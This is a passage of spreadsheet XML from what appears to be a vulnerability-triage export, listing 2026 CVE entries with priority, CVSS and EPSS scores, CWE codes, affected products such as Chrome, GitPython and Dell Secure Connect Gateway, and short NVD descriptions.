      <c r="Q534" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>The league/commonmark (thephpleague/commonmark) library in versions &gt;= 1.5.0 and &lt; 2.9.1 contains quadratic parsing complexity in its SmartPunctExtension and AttributesExtension. When either extension is explicitly registered on the Environment (they are not enabled by default and are excluded from the standard CommonMark and GitHub-Flavored Markdown converters), an unauthenticated attacker can submit small, specially crafted Markdown documents — such as text alternating with unpaired quotes, contiguous runs of block-level attribute blocks, or repeated class attributes — to trigger disproportionate CPU consumption and cause a denial of service. Fixed in 2.9.1.</t>
        </is>
      </c>
      <c r="S534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86429</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87011</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr"/>
      <c r="Q535" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-770</t>
        </is>
      </c>
      <c r="R535"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S535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87011</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87431</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr"/>
      <c r="Q536" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain sensitive information via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87431</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87450</t>
        </is>
      </c>
      <c r="D537" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr"/>
      <c r="Q537" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R537" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Permissions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to obtain sensitive information via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87450</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87601</t>
        </is>
      </c>
      <c r="D538" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F538" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr"/>
      <c r="Q538" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R538" s="5" t="inlineStr">
        <is>
          <t>Race condition in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87601</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87608</t>
        </is>
      </c>
      <c r="D539" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F539" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr"/>
      <c r="Q539" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R539" s="5" t="inlineStr">
        <is>
          <t>Improper certificate validation in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass web origin policy via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87608</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87734</t>
        </is>
      </c>
      <c r="D540" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F540" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr"/>
      <c r="Q540" s="5" t="inlineStr">
        <is>
          <t>CWE-923</t>
        </is>
      </c>
      <c r="R540" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in the utcp package before 0.0.6 for OCaml. Out-of-order segment reassembly allows remote denial of service.</t>
        </is>
      </c>
      <c r="S540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87734</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D541" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L541" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M541" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr"/>
      <c r="Q541" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R541"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S541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87824</t>
        </is>
      </c>
      <c r="D542" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr"/>
      <c r="Q542" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R542" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 fails to validate the samples buffer capacity in Zstd.trainFromBufferDirect, allowing attackers to read past buffer boundaries by supplying oversized per-sample lengths. Attackers can trigger out-of-bounds memory access by providing crafted sample length arrays that cause the native implementation to walk past the buffer allocation, resulting in JVM termination.</t>
        </is>
      </c>
      <c r="S542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87824</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87853</t>
        </is>
      </c>
      <c r="D543" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F543" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr"/>
      <c r="Q543" s="5" t="inlineStr">
        <is>
          <t>CWE-187</t>
        </is>
      </c>
      <c r="R543" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in SSSD's IdP authentication provider. The eval_access_token_buf() function compares the OIDC subject identifier using strncmp() with the authenticated user's identifier length, performing a prefix comparison instead of an exact match. An attacker whose IdP identifier is a strict prefix of a target user's identifier can authenticate as the target user.</t>
        </is>
      </c>
      <c r="S543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87853</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53525</t>
        </is>
      </c>
      <c r="D544" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F544" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr"/>
      <c r="Q544" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="R544" s="5" t="inlineStr">
        <is>
          <t>WeeChat (Wee Enhanced Environment for Chat) is a free chat client. In versions 0.3.1 through 4.9.0, the WeeChat relay authentication uses non-constant-time string comparison functions (weechat_strcasecmp and strcmp) to verify password hashes and plaintext passwords. An attacker can exploit timing differences to extract the server-computed hash character by character, then authenticate using the correct hash without knowing the password. Version 4.9.1 fixes the issue.</t>
        </is>
      </c>
      <c r="S544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53525</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54550</t>
        </is>
      </c>
      <c r="D545" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F545" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr"/>
      <c r="Q545" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R545" s="5" t="inlineStr">
        <is>
          <t>IzPack is a widely used tool for packaging applications on the Java platform as cross-platform installers. In 5.2.6 and earlier, UnpackerBase.unpack() in izpack-installer/src/main/java/com/izforge/izpack/installer/unpacker/UnpackerBase.java obtains an attacker-controlled PackFile targetPath, passes it through IoHelper.translatePath(), which only converts separators, and constructs a File without normalizing parent-directory segments or enforcing destination containment. A malicious installer pack entry containing ../ sequences can therefore write outside the intended installation directory to startup folders, executable search paths, or other locations accessible with the victim's privileges when the victim runs the installer.</t>
        </is>
      </c>
      <c r="S545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54550</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56135</t>
        </is>
      </c>
      <c r="D546" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F546" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr"/>
      <c r="Q546" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R546" s="5" t="inlineStr">
        <is>
          <t>In NTFS-3G through 2026.2.25, a heap-based buffer overflow exists in the function build_inherited_id() in libntfs-3g/security.c that allows an attacker to corrupt heap memory in the SUID-root ntfs-3g binary by crafting a malicious NTFS image. The overflow is triggered by creating a file in a crafted directory.</t>
        </is>
      </c>
      <c r="S546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56135</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71622</t>
        </is>
      </c>
      <c r="D547" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F547" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr"/>
      <c r="Q547" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R547" s="5" t="inlineStr">
        <is>
          <t>SQL injection vulnerability in Zhao-github APiAdmin v.5.0.1 allows a remote attacker to obtain sensitive information via the User.php component</t>
        </is>
      </c>
      <c r="S547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71622</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78254</t>
        </is>
      </c>
      <c r="D548" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F548" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr">
        <is>
          <t>apache:ant</t>
        </is>
      </c>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr"/>
      <c r="Q548" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="R548" s="5" t="inlineStr">
        <is>
          <t>The ftp and scp tasks of Apache Ant can download files from a remote server. A malicious server can provide relative paths that allow it to write outside of the dedicated target directory for the download, making it possible to overwrite files of the attacker's choice using the permissions of the user running Ant in versions prior to Ant 1.10.18. 
In order to exploit this vulnerability, the server would either have to be malicious or be subject to a machine-in-the-middle attack. Additionally in the case of scp or the ftp task using ftps the server must pass the server identity checks performed by the tasks.
For ftp tasks not using ftps a malicious server could act as a machine-in-the-middle to provide malicious files.
Starting with Ant 1.10.18 both tasks will prevent writing outside of the destination directory by default. An option is available to disable this behavior in the unlikely case that the  old behavior is required by existing build files.
Mitigations:
Users of scp and ftp (when using ftps) in any version of Ant should not bypass server identity checks. Users of ftp not using ftps should switch to ftps where possible.
All users are recommended to upgrade to Apache Ant 1.10.18, which fixes this issue.</t>
        </is>
      </c>
      <c r="S548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78254</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78492</t>
        </is>
      </c>
      <c r="D549" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F549" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr"/>
      <c r="Q549" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R549"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549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78492</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78494</t>
        </is>
      </c>
      <c r="D550" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F550" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr"/>
      <c r="Q550" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R550"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550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78494</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79963</t>
        </is>
      </c>
      <c r="D551" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F551" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr"/>
      <c r="Q551" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R551" s="5" t="inlineStr">
        <is>
